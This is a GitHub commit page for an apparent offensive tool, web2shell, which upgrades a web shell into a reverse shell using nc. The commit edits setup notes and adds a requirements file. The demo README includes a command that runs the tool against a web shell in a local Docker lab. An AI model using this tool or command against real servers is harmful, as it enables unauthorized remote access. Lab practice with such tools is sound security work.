Skip to content

Commit f479109

Browse files
committed
Update documentation and add requirements
1 parent 09e048f commit f479109

File tree

3 files changed

+4
-2
lines changed

3 files changed

+4
-2
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -26,7 +26,7 @@ Please note: this program currently is only intended to be used on and against L
2626

2727
## Requirements
2828

29-
All of the Python libraries used should be included in base Python. You will need a copy of `nc`. The program will attempt to find it automatically. If it can't, please specify the path with the `--nc` flag.
29+
Install the required python modules with pip (`pip3 install -r requirements.txt`.) You will need a local copy of `nc`. The program will attempt to find it automatically. If it can't, please specify the path with the `--nc` flag.
3030

3131
## Adding New Payloads
3232

demo/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,4 +4,4 @@
44
2. Run the image (`docker run -it -p 8080:80 webshell`)
55
3. Use web2shell to secure a remote connection on the docker0 interface (`python3 web2shell.py --url http://127.0.0.1:8080/cmd.php?cmd=SHELL --interface docker0`)
66

7-
Note: This Docker container only has `perl` and `php` binaries.
7+
Note: This Docker container only has `python`, `perl`, and `php` binaries.

requirements.txt

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
requests==2.28.1
2+
psutil==5.9.5

0 commit comments

Comments
 (0)